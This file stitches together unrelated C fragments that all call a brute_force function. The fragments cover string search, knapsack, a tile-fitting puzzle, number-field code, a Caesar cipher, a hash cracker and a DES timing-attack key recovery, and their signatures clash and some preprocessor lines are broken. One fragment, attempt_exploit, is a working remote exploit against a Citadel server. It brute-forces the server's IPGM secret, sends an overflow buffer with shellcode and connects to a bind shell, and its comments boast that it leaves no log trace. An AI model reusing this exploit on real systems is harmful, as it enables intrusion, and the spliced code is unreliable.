int main(int argc, char **argv)
{
#if DEBUG
{
char needle[100];
char haystack[1000];
while(scanf("%s %s", needle, haystack) != -1){
int index = brute_force(needle, haystack);
if(index >= 0)
printf("Found %s in %s at %d\n", needle, haystack, index);
else
printf("Failed to find %s in %s\n", needle, haystack);
}
}
#elif
if(argc < 3){
printf("Usage : <command> <pattern> <string>\n");
return 0;
}
int index = brute_force(argv[1], argv[2]);
if(index >= 0)
printf("Found %s in %s at %d\n", argv[1], argv[2], index);
else
printf("Failed to find %s in %s\n", argv[1], argv[2]);
#endif
return 0;
}
void brute_force(const int max_depth, int depth, int num, int w, int v)
{
int temp;
if(depth >= max_depth || w>wub)return;
if(num>=llb && w>=wlb)
{
temp = (v+w-1)/w;
if(temp > answer) answer = temp;
}
brute_force(max_depth, ++depth, num, w, v);
brute_force(max_depth,depth, num+1, w+wei[depth], v+val[depth]);
}
void
tools_reset_counters( void ) {
int err;
hash_delete( var_map );
var_map = NULL;
/*fprintf(stderr, "\nNew var_map\n\n"); */
if ( err = hash_new( 1000, &var_map ), ERR_None != err ) {
nomem( );
}
list_delete( ¤t_arenas );
list_delete( ¤t_free );
note_init_done = 0;
note_new_vars( 0, NULL );
#ifdef BRUTE_FORCE
hash_delete( brute );
brute = NULL;
brute_force( 0, NULL );
#endif
}
int brute_force(struct s_list *list, char **square)
{
int i;
int j;
if (list == NULL)
return (1);
i = -1;
while (square[++i])
{
j = -1;
while (square[i][++j])
{
if (square[i][j] == '.')
{
if (set_a_jeton(square, list, i, j) == 0)
{
if (brute_force(list->next, square) == 1)
return (1);
else
remove_jeton(square, list->id);
}
}
}
}
return (-1);
}
void brute_force(struct s_list *list, char **square)
{
int i;
int j;
i = 0;
while (square[i])
{
j = 0;
while (square[i][j])
{
if (square[i][j] == '.')
{
/*
while (list->flag == 1)
{
printf("on continue");
list = list->next;
continue ;
}*/
if (list->flag == 0 && set_a_jeton(square, &list, i, j) == 0)
{
list = list->next;
display(square); // a enlever
}
}
j++;
}
i++;
}
if (check_list(list) == -1)
brute_force(list, square);
}
int BF_steps(){
int i;
for (i = least; i <= step; i++) {
if (brute_force(i))
return i;
}
return -1;
}
void backtracking(struct s_list *list)
{
char **square;
(void)*list;
square = make_square(DEFAULT);
display(square);
brute_force(list, square);
}
int main(int argc, char * argv[])
{
if(brute_force(argv[1], argv[2]) == 1) {
printf("There is a match\n");
return 0;
}
printf("The pattern is not present\n");
return 0;
}
void backtracking(struct s_list *list, size_t nb_jeton)
{
char **square;
int carre;
carre = fake_sqrt(nb_jeton * 4);
square = make_square(carre);
while (brute_force(list, square) != 1)
square = make_square(carre++);
display(square);
}
/* returns 1 if alpha>alpha_targ */
int compute_alpha(double *alpha, int deg, unsigned int **coeffmod, mpz_t *gmp_coeff, double alpha_targ)
{
double al, dp;
unsigned int p, r;
int i, j, n;
double al_prev, max_rest, rat_rest;
al=0.; max_rest=assess_alpha_max; rat_rest=assess_rat;
if (assess_root_len<deg+1) {
assess_root_len=deg+1;
assess_root=(unsigned int *)xrealloc(assess_root,assess_root_len*sizeof(unsigned int));
}
for (i=0; i<NSMALLPRIMES; i++) {
al_prev=al;
p=assess_primes[i];
if (p>assess_prime_bound) break;
if (coeffmod==NULL) {
compute_coeffmod(p,deg,gmp_coeff);
n=find_pol_roots_homog(p,deg,assess_coeffmod,assess_root);
} else n=find_pol_roots_homog(p,deg,coeffmod[i],assess_root);
j=0; dp=(double)p;
while (j<n) {
r=assess_root[j];
if ((j+1<n) && (r==assess_root[j+1])) { /* multiple zero */
if (r==p) al-=brute_force_proj(p,deg,gmp_coeff);
else al-=brute_force(p,deg,gmp_coeff,r);
} else {
al-=dp*log(dp)/(dp*dp-1);
}
j++;
while ((j<n) && (assess_root[j]==r)) j++;
}
al+=log(dp)/(dp-1);
if (verbose>3) {
printf("%u %.3f %.3f: ",p,al,al-al_prev);
for (j=0; j<n; j++) printf("%u ",assess_root[j]);
printf("\n");
}
if (p>100) {
max_rest-=dp*log(dp)/(dp*dp-1);
rat_rest-=log(dp)/(dp-1);
if (al+rat_rest-max_rest*((double)deg)>alpha_targ) {
return 1;
}
}
}
if (verbose>3) printf("\n");
*alpha=al;
return 0;
}
int main() {
uint32_t hash[4];
char hexstring[33] = {0};
char result[11];
printf("Enter hex hash: ");
fgets(hexstring, 33, stdin);
for (int i = 0; i < 4; i++) sscanf(&hexstring[i * 8], "%8x", &hash[i]);
printf("Decrypting hash: %08x%08x%08x%08x\n", hash[0], hash[1], hash[2], hash[3]);
brute_force(hash, result, 10);
printf("Original text: %s\n", result);
return 0;
}
//测试spec_num函数
int main(int argc, char const *argv[])
{
int A[] = {-1, 1, 2, 3, 5, 8, 10};
int n = sizeof(A) / sizeof(A[0]);
int t = spec_num(A, 0, n-1);
printf("spec_num:%d\n", t);
t = brute_force(A, n);
printf("brute_force:%d\n", t);
printf("one_num:");
t = one_num(A, n);
return 0;
}
int main(int argc, char const *argv[])
{
SString *S,*T;
int result;
printf("Init_string S:\n");
Init_string(&S);
printf("Init_string T:\n");
Init_string(&T);
result = brute_force(S,T);
if (1==result)
{
printf("match it\n");
}
else
printf("not match\n");
return 0;
}
int main(void)
{
FILE *fp;
unsigned char ch,line[80],decrypted[80];
int shift,op = 1;
fp = fopen("/home/nikos/Documents/ProgrammingDevelopmentFolder/april/a13/ciphertext","r");
if(fp == NULL)
{
perror("erron opening the file\n");
exit(EXIT_FAILURE);
}
printf("Content of file is:\n");
while( fgets(line,80,fp) != NULL )
{
printf("%s",line);
}
while( op != 0)
{
printf("Enter the number of shift you wanna make to the ciphertext.\n");
printf("(1 to 25) or enter -1 to exit\n");
scanf("%d",&shift);
if(shift == -1)
exit(0);
else
{
printf("%s\n",brute_force(line,shift,decrypted));
}
}
fclose(fp);
return (0);
}
int main(void)
{
//srand(time(NULL));
int i, j, input_end;
do{
scanf("%d%d%d%d",&n,&llb,&wlb,&wub);
for(i=0; i<n; i++)
{
scanf("%d%d", val+i, wei+i);
//val[i] = rand()%100;
//wei[i] = rand()%10;
}
answer = -1;
//for(i=0; i<n; i++) add[i]=false;//initialize
//for(i=0; i<n; i++)for(j=0; j<n; j++)DP[i][j] = -1;
brute_force(n,-1,0,0,0);
printf("%d\n", answer);
}while( scanf("%d", &input_end) && input_end!=-1 );
return 0;
}
void visit(const Load *op) {
expr = brute_force(op);
}
void visit(const Call *op) {
expr = brute_force(op);
}
double closest(point* sx, int nx, point* sy, int ny, point *a, point *b)
{
int left, right, i;
double d, min_d, x0, x1, mid, x;
point a1, b1;
point *s_yy;
if (nx <= 8) return brute_force(sx, nx, a, b);
s_yy = malloc(sizeof(point) * ny);
mid = sx[nx/2]->x;
/* adding points to the y-sorted list; if a point's x is less than mid,
add to the begining; if more, add to the end backwards, hence the
need to reverse it */
left = -1; right = ny;
for (i = 0; i < ny; i++)
if (sy[i]->x < mid) s_yy[++left] = sy[i];
else s_yy[--right]= sy[i];
/* reverse the higher part of the list */
for (i = ny - 1; right < i; right ++, i--) {
a1 = s_yy[right]; s_yy[right] = s_yy[i]; s_yy[i] = a1;
}
min_d = closest(sx, nx/2, s_yy, left + 1, a, b);
d = closest(sx + nx/2, nx - nx/2, s_yy + left + 1, ny - left - 1, &a1, &b1);
if (d < min_d) { min_d = d; *a = a1; *b = b1; }
d = sqrt(min_d);
/* get all the points within distance d of the center line */
left = -1; right = ny;
for (i = 0; i < ny; i++) {
x = sy[i]->x - mid;
if (x <= -d || x >= d) continue;
if (x < 0) s_yy[++left] = sy[i];
else s_yy[--right] = sy[i];
}
/* compare each left point to right point */
while (left >= 0) {
x0 = s_yy[left]->y + d;
while (right < ny && s_yy[right]->y > x0) right ++;
if (right >= ny) break;
x1 = s_yy[left]->y - d;
for (i = right; i < ny && s_yy[i]->y > x1; i++)
if ((x = dist(s_yy[left], s_yy[i])) < min_d) {
min_d = x;
d = sqrt(min_d);
*a = s_yy[left];
*b = s_yy[i];
}
left --;
}
free(s_yy);
return min_d;
}
int attempt_exploit(void) {
int magic;
// Connect to the host and grab the banner
printf("[-] Connecting to Citadel server (%s) on port %d\n", host, CITADEL_PORT);
if((sock=connect_to_host(host,CITADEL_PORT)) < 1)
return sock;
my_recv(sock);
// Attempt to brute-force the secret IPGM authentication number.
// Only do this if magic number is not given on command-line (-i flag).
magic=magicNumber;
if(!magic) {
printf("[-] Starting bruteforce operation ...\n");fflush(stdout);
if((magic=brute_force(sock))==-1) {
return BRUTE_FORCE_EXHAUSTED;
}
printf("[-] Success! IPGM=%d (seed: %d)\n", magic, seed);
magicNumber=magic; // set magicNumber so we don't run bruteforcer again
// Tear down the socket, and reconnect again (to reauthenticate),
printf("[-] Re-establishing connection to %s ...\n",host);
my_send(sock, "QUIT\n");
my_recv(sock);
close(sock);
if(!(sock=connect_to_host(host,CITADEL_PORT)))
return sock;
}
// Authenticate as internal program, but unlike the brute-force attempts,
// tag 4K of shellcode on the end of the request
printf("[-] Authenticating as internal progam ...\n");
make_shellcode(buf);
my_send(sock, "IPGM %d %s\n", magic, buf);
LOCAL_NET();
buf[recv(sock,buf,SIZ-1,0)]=0; // don't do this at home, kids!
if(strncmp(buf, "200",3)) {
return INCORRECT_IPGM_SECRET;
}
// Increase the chance of the shellcode being in the correct place at the
// correct time by sending it many times... this lets each worker thread
// in Citserver copy the shellcode into a buffer, making it almost
// certain that we can jump to it successfully (it hasn't failed once!)
// Shellcode is stored in a buffer that is used by Citserver to hold
// text that would normally get logged to stderr. As Citserver usually
// runs as a daemon, this exploit doesn't show in any logs at all.
increase_chances(sock,magic);
// Enter configuration import mode, specifically the 'floor' section,
// although I think others may be vulnerable too
printf("[-] Entering config mode ...\n");
my_send(sock, "ARTV import\n");
my_recv(sock);
my_send(sock, "floor\n");
// Start the vulnerable import process which blindly reads in 6 lines of
// data. These lines are read into buffers 4K in size, and the data is
// also truncated at 4K... Unfortunately, the 3rd line goes into a 256
// byte buffer which, of course, overflows..
printf("[-] Sending exploit strings ...\n");
my_send(sock, "a\n");
my_send(sock, "a\n");
// Overflow occurs when this buffer is read by the server, so make sure
// it's padded to the correct size with the evil RET address tagged on
// the end.
make_exploitbuf(buf);
my_send(sock,buf);
// Send the final 3 lines of text. It can be anything we like...
make_shellcode(buf);
for(i=0;i<3;i++)
my_send(sock,buf);
// The server will now have RETurned to the new, malicious saved EIP and
// is executing the shellcode... We close the connection, wait a couple of
// seconds and then connect to the shell which is bound to port 45295.
close(sock);
printf("[-] Waiting before connecting to shell...\n");
sleep(2);
printf("[-] Now connecting to shell...\n");
if(!(sock=connect_to_host(host,SHELL_PORT))) {
return SHELL_NOT_FOUND;
}
printf("[-] Connected! You can type commands now:\n");
// Now let the attacker issue commands to the remote
// shell, just as if (s)he had launched 'nc host 45295'.
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(sock, &rfds);
retVal=select(sock+1, &rfds, NULL, NULL, NULL);
if(retVal) {
if(FD_ISSET(sock, &rfds)) {
buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad!
printf("%s", buf);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, SIZ-1))]='\0'; // bad!
send(sock, buf, strlen(buf), 0);
}
}
} while(retVal && r); // loop until connection terminates
// Be an environmentally friendly programmer and free resources before exiting...
close(sock);
return 1;
}
void visit(const Div *op) {
expr = brute_force(op);
}
int
main (int argc, char **argv)
{
int i; /* Loop index. */
des_key_manager km; /* Key manager. */
double delta = 0, new_delta;
unsigned long long key, bestkey, finalkey, mask;
int sbox;
int k;
/************************************************************************/
/* Before doing anything else, check the correctness of the DES library */
/************************************************************************/
if (!des_check ())
{
ERROR (-1, "DES functional test failed");
}
/*************************************/
/* Check arguments and read datafile */
/*************************************/
/* If invalid number of arguments (including program name), exit with error
* message. */
if (argc != 3)
{
ERROR (-1, "usage: ta <datafile> <nexp>\n");
}
/* Number of experiments to use is argument #2, convert it to integer and
* store the result in variable n. */
n = atoi (argv[2]);
if (n < 1) /* If invalid number of experiments. */
{
ERROR (-1,
"number of experiments to use (<nexp>) shall be greater than 1 (%d)",
n);
}
read_datafile (argv[1], /* Name of data file is argument #1. */
n /* Number of experiments to use. */
);
/*****************************************************************************
* Compute the Hamming weight of output of first (leftmost) SBox during last *
* round, under the assumption that the last round key is all zeros. *
*****************************************************************************/
/* per ogni cipher provo tutte le combinazioni dei primi 6 bit della key
// medio i tempi dei cipher reali che dopo la sbox hanno hamming 0 e 4
// delta tra le due medie
// cambio key e riprovo, terro la key che ha delta maggiore
// ripetero per le box successive */
/* for every SBox */
finalkey = 0ULL;
for(k=0; k<1; k++){
for (sbox = 7; sbox >= 0; sbox--){
mask = 63ULL << (42 - 6*sbox);
finalkey &= ~mask;
/* printf("mask :%012" PRIx64 "\n", ~mask); */
for (i = 0; i < 64; i++){
key = ((unsigned long long) i) << (42 - 6*sbox);
new_delta = try_key(finalkey | key, sbox);
if (new_delta > delta) {
delta = new_delta;
bestkey = key;
}
}
delta = 0;
finalkey |= bestkey;
/*printf("finalkey:%012" PRIx64 "\n", finalkey);*/
}
}
/*******************************************************************************
* Try all the 256 secret keys under the assumption that the last round key is *
* all zeros. *
*******************************************************************************/
/* If we are lucky, the secret key is one of the 256 possible with a all zeros
* last round key. Let's try them all, using the known plain text - cipher text
* pair as an oracle. */
km = des_km_init (); /* Initialize the key manager with no knowledge. */
/* Tell the key manager that we 'know' the last round key (#16) is all zeros. */
des_km_set_rk (km, /* Key manager */
16, /* Round key number */
1, /* Force (we do not care about conflicts with pre-existing knowledge) */
UINT64_C (0xffffffffffff), /* We 'know' all the 48 bits of the round key */
finalkey
);
/* Brute force attack with the knowledge we have and a known
* plain text - cipher text pair as an oracle. */
if (!brute_force (km, pt, ct[0]))
{
/* //printf ("Too bad, we lose: the last round key is not all zeros.\n"); */
}
free (ct); /* Deallocate cipher texts */
free (t); /* Deallocate timings */
des_km_free (km); /* Deallocate the key manager */
/* printf("\n****\nReal key was: e59dcd40dc51b56d\n */
return 0; /* Exits with "everything went fine" status. */
}
